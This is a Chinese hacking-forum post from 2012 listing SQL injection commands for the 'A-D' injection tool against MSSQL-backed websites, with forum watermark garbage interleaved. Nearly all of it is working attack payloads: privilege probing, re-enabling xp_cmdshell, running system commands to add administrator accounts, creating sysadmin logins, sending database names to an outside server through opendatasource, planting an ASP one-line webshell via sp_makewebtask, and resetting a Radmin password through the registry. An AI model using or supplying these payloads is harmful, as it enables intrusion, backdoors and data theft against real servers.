找回密码
 立即注册
查看: 2400|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
阿D常用的一些注入命令
! t6 I, w3 d1 M//看看是什么权限的
4 B% y& I( {8 |3 l( t" W% Q  Kand 1=(Select IS_MEMBER('db_owner'))" v( }- B! Z  @4 `
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--$ O1 e9 x( u% S# J( {; w, V0 `

& m1 O, w, b" J5 H( [: @//检测是否有读取某数据库的权限
1 [' F0 s7 c4 j( S, p) ]% oand 1= (Select HAS_DBACCESS('master'))2 L+ B! [$ X& B7 J
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --) H- q5 x6 v0 Q" _
4 E! ?$ V$ [! v5 D. g  y- l
" O6 P/ i1 w- g7 X% x2 b! F# _& V
数字类型
3 U8 x3 J+ m: Q3 oand char(124)%2Buser%2Bchar(124)=07 d  x# U  m+ y- p
5 X% O1 P' `  z. y' L
字符类型
9 o1 s5 _( ]1 g, j' and char(124)%2Buser%2Bchar(124)=0 and ''=', \- y/ A$ W( n8 P7 ?2 b

; h0 O! }, e- |# x0 C搜索类型2 ?0 A7 i* O* J6 @2 A4 S" M1 x1 `8 N2 T
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
. ]  _) a/ t  u7 r3 Z1 j8 Q4 r0 Z) X
爆用户名
0 [- y$ l2 F! J. l# q. Z4 uand user>03 I6 s" Q; h9 J3 F6 A# T( ?
' and user>0 and ''='
$ z$ f; S: _- H& [# N6 H8 G7 \8 n  L+ U0 W! B
检测是否为SA权限9 i* g3 e& _. P- Y: P; O$ |
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--8 J5 z. ]  e$ G1 j. m( r  d3 L
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
- |0 Y" e2 D+ u
/ H3 B: q" \6 w1 ]6 d检测是不是MSSQL数据库
. I3 `" N+ d6 zand exists (select * from sysobjects);--
2 [1 Z0 B( j/ D0 {# F' b. z; j% L$ x. @5 s! [' l: I( b6 {! N7 Y- D
检测是否支持多行
: o; e! v8 b4 v) o$ o" Z;declare @d int;-- 9 W& x9 {/ }( s. v
8 Y! Y; B: U" }7 k
恢复 xp_cmdshell4 S  `: Z' T2 ^+ V! N$ G
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
3 Y, g: x/ a) |8 T
' y7 }1 G( K: q! U2 U. `
3 X, X/ g% U4 s' eselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') $ `! s% [, x+ I3 k7 w
# j8 X' ~. p% ]9 P! d
//-----------------------3 s; |' h! D: n9 R
//      执行命令; ?, I9 R/ \; ]; V* I& g6 n
//-----------------------, S) G, d3 h2 A0 W1 F
首先开启沙盘模式:3 d- Q9 i9 J6 V7 \6 e9 @4 r: _- o
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
1 t" c( g  ?4 l- N* c5 ~  w; P
然后利用jet.oledb执行系统命令
% r, o  N8 s' [0 A% ]* l9 Nselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')5 w# x4 V! P" D7 D3 g, q# Z, n
, C% B; y# l$ ~$ O/ ~; _% g! @  n
执行命令, E1 x8 U  `! v0 Y5 V* G( |
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
! [, A  M" Q2 q- f' C. @& o
7 H8 I+ _# P+ I+ C/ v& N; p9 mEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
- f! i- ]; c' ]  m$ K/ o
: K& {& K* Z1 G# z" g: G判断xp_cmdshell扩展存储过程是否存在:
6 m1 Y" M1 R$ b$ l, |http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% [' F  B8 D' v0 |" ~: j6 y: H
9 H  c* W; K+ v9 t$ d3 l+ x写注册表. l. ~3 I$ c3 \5 j. G
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1/ y# O2 y" }9 P: V4 P+ X8 X9 C% _

6 @! G' [1 t( x. p& c( h1 NREG_SZ7 L4 U8 H( s9 |3 |
2 X( g6 L; R: ~  _+ l2 R
读注册表& v! Q% b( G- u0 n$ q
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit', c9 B. J( h6 B6 O7 ^% Q% n# R
$ \; g8 Z& D0 e' C/ c
读取目录内容8 P1 H5 h6 j/ r% H+ ~
exec master..xp_dirtree 'c:\winnt\system32\',1,1
8 @4 q$ h. `  E4 |! `1 S. g  I3 D' ]1 d7 S& Z

' F7 J8 I8 y3 Y; s5 l) s5 ~数据库备份
0 [4 |, e! S" N' m/ zbackup database pubs to disk = 'c:\123.bak': n" u3 ]0 \* f6 |. @0 f

& F- Z  w7 b$ d1 O1 J+ v0 ^: n5 P& m//爆出长度
' S, r% t: _6 }+ ^And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--* N5 U) }  R4 j
+ ]2 K" ~% j+ J

$ e. {' J* Z7 A* r8 z
) P8 k2 a" w+ I9 T* @$ h更改sa口令方法:用sql综合利用工具连接后,执行命令:  e2 ~/ Y  Y0 R: r
exec sp_password NULL,'新密码','sa'
' B" L6 `0 y/ b3 h8 L
; c5 u6 ~; H7 v/ M* C6 T: r  C添加和删除一个SA权限的用户test:& k3 R" c4 h; e" {
exec master.dbo.sp_addlogin test,ptlove) X" @/ z. {$ ?) P( w! b
exec master.dbo.sp_addsrvrolemember test,sysadmin) `/ v% ?8 C% [5 A1 V
4 b# H' h7 c7 K' M
删除扩展存储过过程xp_cmdshell的语句: $ {( |! s/ `6 R; B0 y+ v5 A0 u
exec sp_dropextendedproc 'xp_cmdshell'1 V9 K1 L! R& N3 f7 @

+ M$ j4 K8 A+ h. o/ x6 J6 j" l3 ^添加扩展存储过过程6 C( M* A$ I  y. \
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
3 H1 a2 Y/ ]  p7 r7 {GRANT exec On xp_proxiedadata TO public
6 O8 A: B/ Y) e2 J! A+ O  L5 _4 {8 g; a, G
) S. x# A/ V& h! V" R: |
停掉或激活某个服务。 # D- ]4 H% A" q
: M6 L* n7 X) r) V7 ?4 e' h3 C
exec master..xp_servicecontrol 'stop','schedule'
- y6 c5 B( Y$ sexec master..xp_servicecontrol 'start','schedule'
- g% A: e4 M1 ?6 f1 a5 |8 c" i( F6 G9 H5 |% b* U4 Y$ Z( O
dbo.xp_subdirs* g. _6 n  P# Z1 i
0 |; n' r' G2 \& P! M* V. s, w/ q, d
只列某个目录下的子目录。, d0 R/ @  Q- I1 v" ~
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'0 h3 s, w8 E5 p) i, M
/ t- \1 X5 w2 U& I2 j; k* q+ _  Q
dbo.xp_makecab# `4 {+ W% C! R. n/ s

6 v+ B0 o8 S( {将目标多个档案压缩到某个目标档案之内。  B  {1 _$ e) o2 a& X
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
3 g/ o" Y) x1 X6 F- v% p& ]5 u1 c# z5 g1 i' x7 }% i9 F: t
dbo.xp_makecab; `& r2 Z/ D/ W$ I8 Z- u6 R
'c:\test.cab','mszip',1,
! }$ I( Z" Z; S/ y# Y'C:\Inetpub\wwwroot\SQLInject\login.asp',
- l6 B) ^9 V, A& f4 f'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
) a! t  O3 ~1 B* {) B1 }% K) |1 T+ E9 c) m, Z5 B* T/ L
xp_terminate_process
0 k% Z! t& H2 D2 z' M8 Q2 H
& f; p0 _, g1 W7 n- {4 x# k停掉某个执行中的程序,但赋予的参数是 Process ID。
8 N3 t. z$ @; L: c利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
" f4 R2 s& n& v8 X3 w5 [6 z2 d: c7 x9 [. i" W
xp_terminate_process 2484
* \! d$ m+ R% G" a5 Y6 U( g. V
7 H6 [6 ]$ Q. |+ j/ I" y. P( cxp_unpackcab+ W% W# X0 ]+ H# k7 C. h
0 n: S: C; r4 Y0 I
解开压缩档。
/ H- N. @% Y* {) D" c: a! ~4 d& W% }4 B. t# J; t/ k' j
xp_unpackcab 'c:\test.cab','c:\temp',1
3 a& |8 F+ n4 Z, ]/ O2 R
& s6 A( r# j7 }+ w, r. R
+ `1 H* F6 K/ X; l某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
/ t# ^  ^' r$ O& v  c
+ R1 N, ?! h6 u6 k2 T% y" o& Gcreate database lcx;
: O: A! x/ K- F- K2 o# `% zCreate TABLE ku(name nvarchar(256) null);
; N/ c7 Q; f) d  ], b4 DCreate TABLE biao(id int NULL,name nvarchar(256) null);  S* x' q7 B6 j$ u, l4 v3 C7 B+ m
' \4 z- s2 F' L! Z$ }/ P/ l
//得到数据库名0 S( w+ c' X0 u3 v: \0 J, `, f
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
4 _7 A  N  |8 m, W# L; }& k- d
/ {2 G3 P6 j+ b; p0 m! y' B; s/ W* }
//在Master中创建表,看看权限怎样# e' X- |% S5 ], P) h3 T
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
  N: R0 h7 E$ q" F0 x2 l
, B9 B% I) [4 R, j$ [用 sp_makewebtask直接在web目录里写入一句话马:
, C. l. }! ?, y: p% g! bhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
* M/ t& Q7 ~' U5 G, @- x: i+ q' E1 p
//更新表内容
: @0 F7 o% z7 K0 @, EUpdate films SET kind = 'Dramatic' Where id = 123
- R0 a* a1 Y! J( }; l! @6 f. R) W- ^9 @3 J8 X3 c
//删除内容: {: k( i- [% _+ @1 E# o
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表